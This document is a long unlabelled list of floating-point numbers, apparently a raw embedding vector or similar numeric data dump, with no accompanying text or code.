-0.020782800391316414, -0.01662275940179825, 0.0022388508077710867, -0.024229194968938828, -0.0036813756451010704, -0.008720421232283115, -0.011696852743625641, -0.0022410263773053885, 0.04222702980041504, -0.004904149100184441, 0.010817848145961761, -0.0011738191824406385, -0.03992943465709686, 0.0052522700279951096, 0.009834407828748226, 0.02786705456674099, -0.011809991672635078, -0.003705308772623539, -0.00597026851028204, -0.012541045434772968, -0.003729242132976651, 0.023863667622208595, -0.0008751970017328858, -0.012558450922369957, 0.0043275742791593075, 0.01267159078270197, -0.007519405335187912, 0.011583713814616203, 0.010904878377914429, -0.016979582607746124, 0.004821470472961664, -0.0034550970885902643, -0.011174672283232212, -0.025778330862522125, -0.015404337085783482, -0.008937996812164783, 0.013672437518835068, 0.018032647669315338, -0.003030825173482299, 0.005326245445758104, 0.024264007806777954, -0.030373523011803627, 0.010730817914009094, 0.009669050574302673, -0.006131274159997702, -0.003594345413148403, -0.0073453448712825775, 0.00026884159888140857, -0.013280801475048065, -0.022157877683639526, 0.048667263239622116, -0.005234863609075546, 0.010452321730554104, 0.016953473910689354, 0.014394787140190601, 0.021809756755828857, 0.03371548280119896, 0.0013326492626219988, 0.004192677792161703, 0.021009080111980438, 0.0025804440956562757, -0.017910806462168694, 0.01930328831076622, -0.033785104751586914, -0.004912852309644222, 0.010887471958994865, -0.030477959662675858, 0.003881544806063175, -0.0013816036516800523, -0.00016644517017994076, 0.00788493175059557, 0.022418968379497528, -0.004482052754610777, 0.021148327738046646, -0.03140047937631607, 0.00527837872505188, 0.017875993624329567, -0.012514935806393623, 0.004170920234173536, 0.005635202396661043, 0.019895093515515327, -0.015456555411219597, -0.0013087159022688866, -0.021687913686037064, -0.013742061331868172, -0.00697981845587492, -0.023619983345270157, -0.005804911255836487, -0.00311132799834013, 0.020034341141581535, -0.021583478897809982, 0.010870066471397877, -0.013193771243095398, 0.007932798936963081, -0.016335560008883476, 0.001623112359084189, -0.01619631238281727, -0.0003426812472753227, -0.010400103405117989, 0.0091207604855299, 0.007628193125128746, -0.028389235958456993, -0.025569459423422813, -0.0008463682606816292, 0.005804911255836487, 0.046996284276247025, -0.002204038668423891, 0.001639430527575314, -0.016344262287020683, 0.019947310909628868, -0.0035116667859256268, -0.017023097723722458, -0.007288775406777859, -0.00603554118424654, 0.0246469397097826, -0.013759467750787735, 0.0025173472240567207, -0.02127016894519329, 0.000568959629163146, 0.020069153979420662, -0.026979347690939903, 0.040033869445323944, 0.004690925125032663, -0.01536952517926693, 0.04107823222875595, -0.0014022733084857464, 0.004821470472961664, 0.022714870050549507, -0.008946700021624565, -0.0008344015805050731, -0.016527026891708374, -0.004455944057554007, 0.02475137636065483, -0.008394058793783188, 0.020434679463505745, -0.03317589312791824, -0.016735898330807686, -0.023393705487251282, -0.005191348493099213, 0.014507927000522614, 0.014473115094006062, 0.01027826126664877, -0.00276538310572505, -0.01579597219824791, 0.0033441337291151285, 0.007375805638730526, -0.03145269677042961, -0.02595239132642746, -0.00016413343837484717, -0.0121929245069623, 0.011000611819326878, 0.01144446525722742, -0.014934374950826168, 0.02092204988002777, 0.028041115030646324, 0.007280072197318077, -0.0014000976225361228, 0.013193771243095398, 0.0009388377657160163, -0.0007528108544647694, 0.0019255421357229352, -0.00597026851028204, 0.008855318650603294, -0.026979347690939903, -0.012436608783900738, 0.008981511928141117, -0.020434679463505745, -0.011531495489180088, 0.025273557752370834, -0.0036139271687716246, 0.0077108717523515224, 0.010826551355421543, -0.01536952517926693, -0.004551677033305168, -0.0017830303404480219, -0.008946700021624565, -0.00769781693816185, 0.01295008696615696, 0.022418968379497528, 0.019895093515515327, 0.0015904760221019387, 0.0023998564574867487, -0.021252764388918877, -0.020016934722661972, -0.02449028566479683, 0.005487251095473766, -0.008224349468946457, -0.007584678009152412, -0.02111351490020752, 0.005817965604364872, -0.023759232833981514, -0.007776144426316023, 0.0056700147688388824, -0.007136472500860691, -0.03310627117753029, 0.015830785036087036, -0.007114714942872524, 0.014647174626588821, -0.013672437518835068, 0.023358892649412155, 0.016979582607746124, 0.01784118078649044, -0.019982123747467995, 0.02529096230864525, -0.0026348379906266928, -0.009608129039406776, 0.009851813316345215, -0.015204167924821377, -0.02983393706381321, -0.022540809586644173, -0.005835372023284435, 0.01648351177573204, -0.006166086532175541, -0.01784118078649044, 0.020939454436302185, 0.011888318695127964, -0.016318153589963913, 0.04038199037313461, 0.0031243825796991587, 0.012210330925881863, 0.013750764541327953, 0.008437573909759521, -0.019442535936832428, 0.020190995186567307, 0.018833326175808907, 0.019077010452747345, 0.0038750176317989826, 0.009512395597994328, 0.02342851832509041, -0.007558568846434355, 0.005817965604364872, -0.010643787682056427, 0.038432516157627106, -0.01421202439814806, 0.016422590240836143, -0.0045255678705871105, 0.03009502775967121, -0.009608129039406776, -0.0028263041749596596, -0.0198602806776762, -0.007014630362391472, 0.002070229733362794, 0.0022410263773053885, 0.00034948045504279435, -0.00446029519662261, 0.008354894816875458, 0.0019581785891205072, -0.012088488787412643, 0.008515900932252407, -0.002312826458364725, 0.026787880808115005, -0.036065295338630676, -0.014203321188688278, 0.03211412578821182, -0.013489673845469952, 0.0157176461070776, -0.004157865419983864, 0.012810838408768177, -0.029363974928855896, -0.01587430015206337, 0.00015175883891060948, -0.005517711862921715, -0.00045337271876633167, 0.0017003515968099236, -0.0020462966058403254, 0.008067695423960686, -0.020190995186567307, 0.008724773302674294, 0.014133697375655174, 0.003252752125263214, 0.001956002786755562, 0.004660464823246002, 0.004703979939222336, -0.0014762489590793848, 0.030216868966817856, -0.0060834079049527645, -0.0024629533290863037, -0.01141835656017065, -0.006148680578917265, -0.019320694729685783, 0.011331326328217983, -0.003990332596004009, 0.005400220863521099, 0.004495107568800449, 0.020678365603089333, -0.022714870050549507, 0.012610669247806072, -0.006257467903196812, 0.015804676339030266, 0.0014947429299354553, -0.003228818764910102, -0.0332455188035965, -0.005504657048732042, -0.018224114552140236, 0.009155572392046452, -0.0022094780579209328, 0.01855482906103134, -0.010713412426412106, -0.018119677901268005, -0.017719339579343796, -0.01368114072829485, -0.013646327890455723, 0.006435879971832037, -0.001039466354995966, 0.0025869712699204683, 0.016788117587566376, -0.004284059163182974, 0.00572223262861371, 0.009782189503312111, 0.0158481914550066, 0.0051957000978291035, 0.0246469397097826, 0.009442771784961224, 0.019111821427941322, 0.005613444838672876, 0.017397327348589897, -0.017597496509552002, 0.023358892649412155, -0.006501152645796537, -0.021548666059970856, 0.004791010171175003, 0.029102884232997894, 0.007575974799692631, -0.005526414606720209, -0.0047300891019403934, 0.015534882433712482, 0.031922660768032074, -0.046787410974502563, 0.01075692754238844, -0.008598579093813896, -0.006971115246415138, 0.001315243192948401, 0.017136236652731895, -0.01970362663269043, 0.022418968379497528, -0.0042383684776723385, -0.0043297503143548965, 0.01864185929298401, 0.011244296096265316, -0.0019451240077614784, -0.013185068033635616, -0.0066752126440405846, -0.023202238604426384, -0.011279108002781868, 0.007449781056493521, 0.017693230882287025, 0.013594110496342182, -0.014403490349650383, -0.003670496866106987, 0.005748341791331768, -0.003252752125263214, 0.014577550813555717, -0.00852025207132101, -0.010617678984999657, 0.006888436619192362, -0.0024999412707984447, -0.007336642127484083, -0.026944536715745926, 0.001466458081267774, 0.018467798829078674, 0.029294349253177643, -0.023271862417459488, 0.008254810236394405, 0.01013031043112278, 0.00666650990024209, -0.005543821025639772, 0.01813708432018757, 0.005948510952293873, -0.015439148992300034, -0.015404337085783482, 0.008115561679005623, -0.037318531423807144, -0.014960483647882938, 0.007645599078387022, -0.017005691304802895, -0.004170920234173536, -0.03148750960826874, -0.01563061587512493, -0.003805393585935235, 0.0070407395251095295, -0.013655031099915504, -0.01536952517926693, -0.012784729711711407, 0.005099967122077942, -0.012236439622938633, 0.000995407346636057, 0.0182415209710598, 0.0015872124349698424, 0.018624452874064445, 0.015230276621878147, -0.003254927694797516, 0.01885073073208332, 0.0037314179353415966, -0.04006868228316307, 0.008437573909759521, -0.005365408957004547, -0.0009818088728934526, 0.005134779028594494, -0.007793550379574299, 0.004521216731518507, -0.00781965907663107, 0.0007397563313134015, 0.019268475472927094, 0.009164275601506233, 0.02393329329788685, 0.0014773368602618575, -0.013637625612318516, -0.014977889135479927, -0.008311379700899124, -0.003733593737706542, 0.011392246931791306, 0.0070755514316260815, -0.016344262287020683, -0.007871877402067184, -0.003539951518177986, 0.0008333137375302613, -0.007497647777199745, -0.005443735979497433, -0.014638472348451614, 0.01194053702056408, -0.014151102863252163, 0.002708813641220331, -0.024873217567801476, 0.005047748796641827, -0.0016644516726955771, 0.0079240957275033, 0.008903184905648232, -0.013550595380365849, -0.013881309889256954, 0.01712753437459469, 0.01914663426578045, 0.0019146633567288518, -0.01322858314961195, -0.012532342225313187, 0.006775297690182924, -0.03119160793721676, 0.011296514421701431, 0.00952109880745411, 0.003861963050439954, 0.009695159271359444, 0.003729242132976651, 0.0003690622397698462, -0.012776026502251625, -0.033193301409482956, 0.016692383214831352, 0.006383661646395922, -0.001630727550946176, 0.009834407828748226, 0.00020343298092484474, -0.008742178790271282, 0.00748459342867136, 0.009112057276070118, -0.005800559651106596, -0.01885073073208332, 0.003287564031779766, 0.017353812232613564, 0.026370136067271233, 0.006844921503216028, 0.014516630209982395, 0.025360586121678352, -0.0022606083657592535, 0.004843228030949831, -0.022767089307308197, -0.008159076794981956, 0.027692995965480804, 0.004656113218516111, 0.020730582997202873, 0.008585524745285511, -0.009555910713970661, 0.0030699886847287416, -0.005561226978898048, -0.012454015202820301, 0.0027545043267309666, 0.004073011223226786, 0.010104200802743435, 0.003557357471436262, 0.006971115246415138, -0.000602683809120208, -0.02489062398672104, 0.002486886689439416, -0.03815402090549469, -0.018363362178206444, 0.012271251529455185, 0.016022251918911934, 0.010112904012203217, -0.005369760561734438, 0.004001211374998093, 0.007837065495550632, 0.019512159749865532, 0.02137460559606552, 0.0038837206084281206, -0.01534341648221016, 0.006901491433382034, 0.0008235228597186506, -0.01285435352474451, 0.02494284138083458, 0.02353295311331749, 0.010948393493890762, -0.005504657048732042, -0.0013631097972393036, -0.003907653968781233, -0.007462835870683193, -0.027031565085053444, 0.0017873818287625909, 0.0019647057633847, 0.01643129251897335, -0.0005297960597090423, -0.006588182877749205, -0.012810838408768177, -0.01632685773074627, 0.009834407828748226, -0.000958963530138135, 0.004062132444232702, -0.013324316591024399, 0.008837912231683731, -0.006862327456474304, -0.010147715918719769, -0.0068797338753938675, -0.015386931598186493, -0.013863903470337391, -0.0012184221995994449, 0.0314352922141552, 0.010495836846530437, 0.0013772521633654833, 0.013289504684507847, -0.00029100707615725696, -0.012480123899877071, -0.001475161174312234, -0.002828479977324605, 0.02449028566479683, -0.0006472867680713534, 0.0017416909104213119, 0.00003307825681986287, -0.015778567641973495, 0.017728041857481003, 0.006723079364746809, 0.0031417885329574347, -0.00584407476708293, 0.004743143450468779, -0.005030342843383551, -0.013507080264389515, 0.00009376139496453106, 0.019929904490709305, 0.0007767441566102207, -0.018415581434965134, 0.00942536536604166, 0.015943923965096474, -0.009834407828748226, -0.009312226437032223, 0.005234863609075546, 0.007532459683716297, -0.01335912849754095, 0.008546360768377781, 0.00496507016941905, 0.006318389438092709, 0.0039011265616863966, 0.02621348202228546, 0.0046691675670444965, -0.000020193716409266926, -0.006553370505571365, 0.0038162723649293184, 0.01093969028443098, -0.009729971177875996, -0.0005145657924003899, 0.01900738663971424, 0.011392246931791306, -0.014168509282171726, 0.007571623660624027, -0.021026484668254852, 0.0070059276185929775, -0.007528108544647694, 0.010826551355421543, -0.02988615445792675, 0.03373288735747337, -0.000173788343090564, 0.0017264606431126595, 0.012036270461976528, -0.013907418586313725, 0.010957096703350544, 0.013759467750787735, -0.002932916162535548, -0.012715105898678303, -0.00374229671433568, 0.0053392997942864895, 0.008711718022823334, 0.0024390199687331915, -0.009416663087904453, -0.004512513522058725, 0.0011814343743026257, 0.020190995186567307, 0.003711836179718375, -0.002402032259851694, -0.01168814953416586, -0.0017928212182596326, -0.00838970672339201, 0.004096944350749254, 0.006366255693137646, -0.0034072306007146835, 0.013863903470337391, 0.0025521593634039164, 0.01733640767633915, -0.017379920929670334, -0.0027283953968435526, 0.005004233680665493, 0.030147245153784752, -0.01342875324189663, 0.005774450954049826, 0.00691889738664031, 0.014255539514124393, -0.009199087508022785, 0.009190384298563004, 0.009756079874932766, 0.019982123747467995, -0.01637907512485981, -0.004882391542196274, 0.014655877836048603, 0.00634884973987937, -0.009938843548297882, 0.023898480460047722, 0.009216492995619774, 0.014525332488119602, 0.004991179332137108, 0.006044244393706322, 0.00007016806193860248, 0.0018091393867507577, -0.009051135741174221, -0.01410758774727583, 0.004194853361696005, 0.018206708133220673, -0.007928446866571903, -0.003233170136809349, 0.02863292023539543, 0.020573928952217102, 0.0021561721805483103, 0.001850478700362146, 0.023150021210312843, -0.018032647669315338, -0.0035268969368189573, 0.021983817219734192, -0.0006538140587508678, -0.022192688658833504, 0.009094650857150555, -0.0020724055357277393, 0.003718363353982568, 0.007641247473657131, -0.011879616416990757, 0.012619372457265854, -0.004660464823246002, 0.012488827109336853, -0.018380768597126007, 0.028615515679121017, 0.0011672918917611241, 0.0005368672427721322, -0.014786423183977604, -0.023010773584246635, 0.007301829755306244, 0.003585642436519265, -0.030164651572704315, 0.002356341341510415, 0.010191231034696102, -0.009921438060700893, -0.026126451790332794, 0.025639083236455917, 0.004477701615542173, 0.012532342225313187, 0.013628922402858734, 0.02499506063759327, -0.001331561361439526, 0.0030068918131291866, 0.0010525209363549948, -0.005978971719741821, -0.010730817914009094, -0.008302676491439342, -0.00026353818248026073, 0.004743143450468779, 0.005443735979497433, -0.007436726707965136, 0.016466105356812477, 0.012810838408768177, 0.014890859834849834, 0.005474196746945381, -0.018711483106017113, 0.0014947429299354553, -0.010870066471397877, 0.01282824482768774, 0.005817965604364872, 0.00022097499459050596, -0.006679564248770475, -0.010112904012203217, 0.02071317657828331, -0.010722114704549313, -0.014821235090494156, -0.029694689437747, -0.012271251529455185, -0.005765747744590044, -0.0003029737272299826, 0.014177212491631508, -0.01207108236849308, 0.017667122185230255, -0.01855482906103134, -0.014420896768569946, 0.005317542236298323, -0.024455472826957703, 0.017353812232613564, -0.003507315181195736, 0.024908030405640602, -0.010574163869023323, -0.014098885469138622, 0.004956367425620556, -0.019390318542718887, -0.013776873238384724, 0.019790656864643097, -0.007993719540536404, 0.0005045029101893306, -0.014168509282171726, 0.02529096230864525, -0.0024847108870744705, 0.012105894275009632, 0.013185068033635616, 0.031383074820041656, -0.006435879971832037, -0.01295008696615696, -0.0018265453400090337, 0.019721033051609993, 0.0023193536326289177, -0.01409018225967884, -0.00462565291672945, -0.0067709460854530334, 0.011757774278521538, -0.027344875037670135, 0.0032396975439041853, 0.0091207604855299, 0.012984898872673512, 0.02196641080081463, 0.004192677792161703, -0.0024520745500922203, 0.00565695995464921, -0.01914663426578045, 0.006649103946983814, 0.01624852977693081, -0.005565578583627939, -0.0015295549528673291, -0.00546984514221549, 0.024072540923953056, 0.015761161223053932, 0.014890859834849834, -0.0029873100575059652, 0.02429881878197193, 0.013663734309375286, 0.0048736887983977795, 0.017875993624329567, -0.011679446324706078, 0.006435879971832037, -0.016683680936694145, -0.023602578788995743, -0.0005501937703229487, 0.007649950683116913, 0.0042209625244140625, -0.0223841555416584, 0.015517476946115494, -0.012488827109336853, -0.010974502190947533, -0.029746906831860542, 0.003809744957834482, 0.0060834079049527645, -0.016666274517774582, -0.0012108070077374578, -0.015334713272750378, -0.0009725620038807392, -0.0004158409428782761, 0.00899891834706068, -0.012984898872673512, 0.02489062398672104, 0.0026587711181491613, 0.005965916905552149, -0.028650326654314995, -0.011609822511672974, -0.002554334932938218, -0.013028413988649845, -0.017754152417182922, 0.030147245153784752, 0.006818812806159258, 0.012871759943664074, 0.011853506788611412, -0.023950697854161263, -0.011897021904587746, -0.0038293267134577036, 0.02363738976418972, -0.0014512278139591217, -0.012219034135341644, 0.004271004814654589, -0.008981511928141117, -0.004001211374998093, 0.007267017848789692, -0.014246836304664612, 0.016205014660954475, 0.01536952517926693, -0.030147245153784752, 0.011679446324706078, 0.02036505565047264, -0.0071321213617920876, -0.003700957400724292, 0.024559909477829933, 0.0005346914986148477, -0.005965916905552149, -0.0028480617329478264, -0.017353812232613564, -0.023306675255298615, -0.00017365235544275492, -0.003287564031779766, -0.018868137151002884, -0.021026484668254852, 0.02156607247889042, -0.01744084246456623, -0.015238979831337929, -0.02334148809313774, 0.03256668522953987, 0.007663005031645298, -0.00782836228609085, -0.02010396495461464, 0.03860657662153244, 0.002495589666068554, -0.001205367618240416, -0.020800206810235977, -0.007541162893176079, -0.009286117739975452, -0.0018363362178206444, 0.022941147908568382, 0.01799783669412136, -0.0025173472240567207, -0.008964105509221554, 0.009660347364842892, -0.015604506246745586, -0.001639430527575314, 0.006479395087808371, 0.013132850639522076, -0.003931587096303701, -0.004305816721171141, -0.00003787171590374783, 0.008955403231084347, -0.012845651246607304, 0.018119677901268005, 0.01613539084792137, 0.009555910713970661, -0.017963023856282234, 0.015430446714162827, 0.013211177662014961, 0.0008447364089079201, -0.038432516157627106, -0.005661311559379101, -0.008437573909759521, -0.005748341791331768, 0.006649103946983814, 0.0048562828451395035, -0.002850237535312772, -0.0035247213672846556, -0.003948993049561977, 0.006335795391350985, 0.000519733177497983, -0.006636049132794142, 0.009216492995619774, 0.00962553545832634, 0.010060685686767101, -0.008507197722792625, -0.011000611819326878, 0.009982358664274216, 0.002806722419336438, 0.0026500681415200233, -0.013298207893967628, -0.00852025207132101, -0.006031189579516649, -0.021792350336909294, -0.015752457082271576, 0.010252152569591999, -0.007027685176581144, 0.00622265599668026, -0.0005814702017232776, -0.023306675255298615, 0.0011411828454583883, -0.00836359802633524, 0.009077245369553566, 0.010948393493890762, 0.006814461201429367, -0.01040880661457777, -0.006270522717386484, 0.004947664216160774, -0.024559909477829933, -0.004717034287750721, 0.023115208372473717, -0.005043397657573223, -0.04208778217434883, -0.002761031733825803, -0.030303899198770523, 0.013759467750787735, 0.005891941487789154, 0.0027066378388553858, -0.00506515521556139, 0.009390553459525108, -0.009808298200368881, -0.007114714942872524, 0.020747989416122437, -0.016022251918911934, 0.03437691181898117, 0.007780496031045914, -0.004140459466725588, -0.0009214317542500794, 0.021200545132160187, -0.011453168466687202, 0.020069153979420662, 0.008206943981349468, -0.004969421774148941, 0.013037117198109627, 0.008193888701498508, 0.0027762618847191334, -0.00029182297294028103, 0.019077010452747345, -0.007932798936963081, -0.005021640099585056, 0.014734204858541489, -0.00836359802633524, -0.0055960388854146, 0.009825704619288445, -0.008937996812164783, -0.005365408957004547, 0.010896175168454647, -0.014420896768569946, 0.017249377444386482, 0.012001458555459976, -0.002187720499932766, 0.007467187475413084, -0.015917815268039703, 0.006240061949938536, 0.004864985588937998, 0.016091875731945038, 0.013533188961446285, 0.007663005031645298, -0.012688996270298958, 0.005348003003746271, 0.006470691878348589, -0.008846615441143513, -0.005556875374168158, 0.001972320955246687, -0.0050172884948551655, -0.00942536536604166, -0.0013087159022688866, -0.02459472231566906, 0.027884460985660553, 0.018676670268177986, -0.006483746692538261, 0.0026109046302735806, -0.03225337341427803, -0.007702168542891741, 0.02590017393231392, -0.027240438386797905, 0.02831961214542389, -0.035560522228479385, -0.009843110106885433, 0.012184221297502518, -0.018032647669315338, 0.014333866536617279, -0.010339182801544666, -0.0031243825796991587, -0.013811685144901276, -0.0031135038007050753, -0.013776873238384724, -0.013524485751986504, 0.0005034150672145188, -0.022314531728625298, -0.006205250043421984, -0.00634884973987937, 0.0019113997695967555, 0.006936303339898586, -0.00540457246825099, 0.026544196531176567, -0.007323587313294411, 0.009834407828748226, 0.016309451311826706, -0.0013304734602570534, 0.01925107091665268, -0.007375805638730526, -0.005987674463540316, -0.0041665686294436455, 0.006888436619192362, -0.009451474994421005, -0.010965799912810326, -0.00952109880745411, 0.0028176011983305216, 0.01661405712366104, -0.00622265599668026, -0.013237286359071732, -0.013846497982740402, 0.013385238125920296, 0.008911888115108013, -0.00002525914169382304, -0.005983323324471712, -0.004138283897191286, -0.017249377444386482, 0.02882438711822033, -0.014699392952024937, 0.016257232055068016, -0.004223138093948364, 0.022262314334511757, -0.006461989134550095, 0.010121607221662998, -0.0012989250244572759, -0.006113868206739426, 0.009886625222861767, -0.016735898330807686, -0.015830785036087036, -0.013637625612318516, 0.003405054798349738, -0.012027567252516747, 0.004738791845738888, -0.00861598551273346, -0.0014610186917707324, -0.009869219735264778, 0.009329632855951786, -0.006779648829251528, 0.012784729711711407, -0.014734204858541489, -0.006988521199673414, 0.0097995949909091, 0.017719339579343796, -0.015674130991101265, 0.004821470472961664, -0.016413887962698936, 0.01904219761490822, 0.007780496031045914, -0.015386931598186493, -0.01449052058160305, -0.00246948073618114, -0.004142635501921177, 0.015604506246745586, -0.01574375480413437, 0.02454250305891037, 0.00892059039324522, -0.006314037833362818, 0.0025434561539441347, -0.005678717512637377, 0.012993602082133293, 0.017353812232613564, 0.007332290522754192, 0.018781106919050217, -0.0020408572163432837, -0.015308604575693607, -0.02172272652387619, 0.0014142399886623025, 0.012210330925881863, -0.0013424401404336095, -0.0033528367057442665, -0.021531259641051292, 0.008711718022823334, 0.0024934138637036085, 0.019564379006624222, 0.004125229548662901, -0.0005074946093373001, -0.003444218309596181, 0.00020805645908694714, 0.010191231034696102, -0.0005548172630369663, 0.00456038024276495, -0.008198240771889687, 0.0013174189953133464, -0.006823163945227861, -0.008850966580212116, 0.0035660606808960438, 0.004677870776504278, -0.0070755514316260815, -0.00011490700126159936, 0.027257844805717468, -0.02435103803873062, -0.036204542964696884, 0.0005444823764264584, -0.009956249967217445, 0.00892059039324522, 0.022993367165327072, 0.0070233335718512535, -0.012836948037147522, 0.005365408957004547, 0.02762337028980255, 0.0073453448712825775, 0.017641011625528336, -0.0180500540882349, 0.0002284541551489383, -0.019738439470529556, 0.020939454436302185, 0.01295008696615696, -0.01741473376750946, -0.008633391000330448, -0.002447723178192973, 0.0037531754933297634, -0.0045081619173288345, -0.003246224718168378, -0.007206096779555082, 0.010217339731752872, -0.006457637529820204, 0.012375688180327415, -0.0028850496746599674, 0.02313261479139328, -0.010199934244155884, 0.004521216731518507, 0.01590040884912014, -0.0111920777708292, 0.013315613381564617, 0.013942230492830276, 0.007628193125128746, 0.006092110648751259, 0.010896175168454647, 0.010313073173165321, -0.010139012709259987, -0.0006777473026886582, -0.028354424983263016, -0.002591322874650359, 0.0155261792242527, -0.01217551901936531, 0.009843110106885433, 0.017980430275201797, -0.006300983019173145, 0.002930740360170603, 0.004044726490974426, -0.0035638848785310984, -0.02701416052877903, -0.0022366750054061413, 0.0015328185399994254, 0.00857682153582573, 0.0038576116785407066, 0.019338101148605347, 0.000813731923699379, 0.007932798936963081, 0.022314531728625298, -0.010521945543587208, 0.009538505226373672, 0.0023193536326289177, 0.011897021904587746, 0.007349696476012468, 0.010643787682056427, 0.007593380752950907, 0.018119677901268005, 0.004952015820890665, -0.008872724138200283, -0.007706520147621632, 0.013576704077422619, 0.013132850639522076, -0.017049206420779228, -0.0010867890669032931, -0.012749917805194855, -0.003790163202211261, 0.009390553459525108, 0.017110127955675125, 0.012332173064351082, 0.001500182319432497, -0.008185186423361301, -0.0026435409672558308, -0.011261701583862305, 0.01600484549999237, -0.00870736688375473, -0.004355859011411667, -0.024960247799754143, 0.008485440164804459, 0.006270522717386484, -0.0034485699143260717, 0.01864185929298401, 0.00035328802186995745, -0.005931104999035597, -0.004529919475317001, 0.015056217089295387, -0.0004590840544551611, 0.01701439544558525, -0.011461871676146984, -0.0006472867680713534, 0.012306063435971737, 0.025238744914531708, -0.007536811288446188, 0.014420896768569946, -0.032375216484069824, -0.015482664108276367, -0.0110615324229002, -0.01762360706925392, 0.0005722232745029032, 0.0008926030131988227, 0.020452085882425308, 0.013037117198109627, 0.0074889445677399635, 0.004699628334492445, -0.0059398082084953785, 0.025586865842342377, 0.011653337627649307, -0.004168744198977947, 0.0011651162058115005, -0.000030681527277920395, 0.009347038343548775, 0.015334713272750378, 0.008655148558318615, 0.00527837872505188, 0.01068730279803276, -0.020835019648075104, -0.0012238615890964866, 0.0015404337318614125, 0.00845497939735651, 0.01829373836517334, -0.009938843548297882, 0.0056700147688388824, -0.005365408957004547, -0.003729242132976651, 0.010669897310435772, -0.011949240230023861, -0.010826551355421543, -0.005012936890125275, 0.014394787140190601, 0.006814461201429367, 0.010669897310435772, 0.02116573415696621, -0.013802982866764069, -0.007719574496150017, -0.009416663087904453, -0.08097285777330399, 0.024368442595005035, 0.004429834894835949, 0.010852660052478313, -0.018868137151002884, 0.002330232411623001, 0.019738439470529556, 0.015317306853830814, 0.008594227954745293, 0.00917297787964344, 0.014159806072711945, -0.013028413988649845, 0.004621301311999559, 0.0011509738396853209, -0.0005999641143716872, 0.013289504684507847, 0.020539116114377975, 0.006013783626258373, 0.0059398082084953785, -0.003977278247475624, -0.009138165973126888, -0.0024629533290863037, -0.025726113468408585, -0.0011096345260739326, -0.005308839492499828, 0.005474196746945381, 0.001756921294145286, -0.0005281642661429942, 0.0010525209363549948, 0.0018820271361619234, 0.006361904088407755, 0.008333137258887291, -0.02097426727414131, -0.018815919756889343, 0.009669050574302673, -0.01260196603834629, -0.009486286900937557, 0.001432733959518373, 0.0070233335718512535, -0.0061182198114693165, -0.013219880871474743, 0.020835019648075104, -0.00004565683411783539, -0.000421552307670936, 0.0016209366731345654, -0.036413416266441345, -0.02414216473698616, 0.021635696291923523, -0.015839487314224243, -0.008724773302674294, -0.009320929646492004, 0.0040055629797279835, 0.0028981042560189962, -0.018067460507154465, 0.008367949165403843, 0.012253846041858196, -0.0006984170177020133, -0.03009502775967121, -0.008929293602705002, 0.00481276772916317, 0.013446158729493618, -0.006505504250526428, -0.0021300630178302526, -0.019512159749865532, 0.00710601219907403, 0.023254457861185074, 0.0012282130774110556, 0.0040947687812149525, -0.013698546215891838, 0.008102507330477238, 0.00424707168713212, -0.01656183786690235, 0.006857976317405701, -0.006409770809113979, -0.004225314129143953, -0.01677941344678402, -0.01900738663971424, 0.006544667761772871, 0.003346309531480074, -0.0058310204185545444, 0.007654302287846804, 0.006079056300222874, -0.013820388354361057, -0.004817118868231773, -0.011783882975578308, -0.005539469420909882, 0.00040496219298802316, 0.016996989026665688, 0.026143858209252357, 0.010452321730554104, -0.0021289752330631018, 0.01935550570487976, -0.0038380299229174852, 0.011496683582663536, 0.02055652253329754, -0.003548654494807124, 0.0030699886847287416, 0.013829091563820839, -0.019372912123799324, 0.0034572728909552097, -0.0012717280769720674, -0.024768782779574394, -0.003318024566397071, -0.009129462763667107, 0.012845651246607304, -0.0021278872154653072, 0.0022138296626508236, -0.009155572392046452, 0.0035116667859256268, -0.023898480460047722, 0.022401561960577965, 0.0043819681741297245, 0.02207084745168686, 0.001243443344719708, -0.012227736413478851, -0.0006576215964742005, 0.02302817814052105, -0.00010130854207091033, -0.009416663087904453, 0.015256386250257492, 0.003418109379708767, 0.0016220244579017162, 0.009468880482017994, -0.0030591099057346582, -0.009912734851241112, -0.007645599078387022, 0.0011857858626171947, -0.010234746150672436, -0.012567154131829739, 0.009712565690279007, 0.0021844569128006697, 0.027536340057849884, -0.010391400195658207, 0.003642211901023984, 0.011226889677345753, -0.0017960848053917289, 0.009364444762468338, -0.0012891341466456652, -0.0076934657990932465, -0.03637860342860222, 0.006636049132794142, -0.0038032177835702896, 0.00965164415538311, -0.004353683441877365, -0.002061526756733656, -0.02368960715830326, -0.021844569593667984, 0.013167662546038628, 0.0004854650760535151, 0.00502599123865366, 0.010548055171966553, 0.014351272024214268, -0.011122453957796097, 0.022767089307308197, -0.014951780438423157, 0.0041121747344732285, 0.034951310604810715, 0.012010161764919758, 0.00886837299913168, -0.009782189503312111, 0.015378228388726711, 0.014647174626588821, -0.004397198557853699, 0.03710965812206268, -0.008585524745285511, -0.008076398633420467, -0.009442771784961224, -0.0032027096021920443, -0.009860516525804996, 0.013776873238384724, 0.013724654912948608, 0.013315613381564617, -0.036308981478214264, -0.005234863609075546, 0.01322858314961195, -0.007719574496150017, -0.009320929646492004, -0.03690078482031822, 0.024403255432844162, -0.006779648829251528, 0.002402032259851694, 0.0014088005991652608, 0.012932680547237396, -0.015830785036087036, -0.009407959878444672, 0.00408824160695076, 0.006631697993725538, 0.01685774140059948, -0.022505998611450195, 0.02193159982562065, 0.015282494947314262, 0.033088862895965576, 0.010643787682056427, -0.013437455520033836, -0.0033376063220202923, 0.005030342843383551, 0.015352119691669941, 0.029068071395158768, -0.0009518922888673842, -0.00788493175059557, 0.01461236272007227, 0.02398551069200039, 0.000733229040633887, -0.0025347531773149967, 0.008803100325167179, -0.018380768597126007, 0.006553370505571365, 0.004281883593648672, 0.010878769680857658, 0.02287152409553528, 0.024055134505033493, -0.003261455101892352, 0.006492449436336756, -0.006361904088407755, -0.006466340273618698, 0.004690925125032663, -0.0021050418727099895, 0.010008467361330986, -0.016527026891708374, 0.025360586121678352, -0.003318024566397071, -0.0038249753415584564, -0.003620454343035817, 0.00881180353462696, 0.0012129828101024032, -0.025029871612787247, 0.01562191266566515, 0.006057298742234707, 0.0032440489158034325, 0.015691537410020828, -0.013289504684507847, 0.008119913749396801, -0.005770099349319935, 0.02520393207669258, 0.008394058793783188, 0.03134826198220253, 0.002099602483212948, -0.02297596074640751, 0.0045255678705871105, 0.013263395987451077, 0.02414216473698616, 0.0021779295057058334, -0.02227971889078617, -0.030025403946638107, -0.008080749772489071, 0.008067695423960686, 0.04494237154722214, -0.014133697375655174, -0.010730817914009094, -0.015830785036087036, 0.003983805421739817, -0.0223841555416584, -0.009512395597994328, 0.019825469702482224, -0.015987439081072807, 0.02953803353011608, -0.00119340093806386, 0.010347885079681873, 0.003128733951598406, 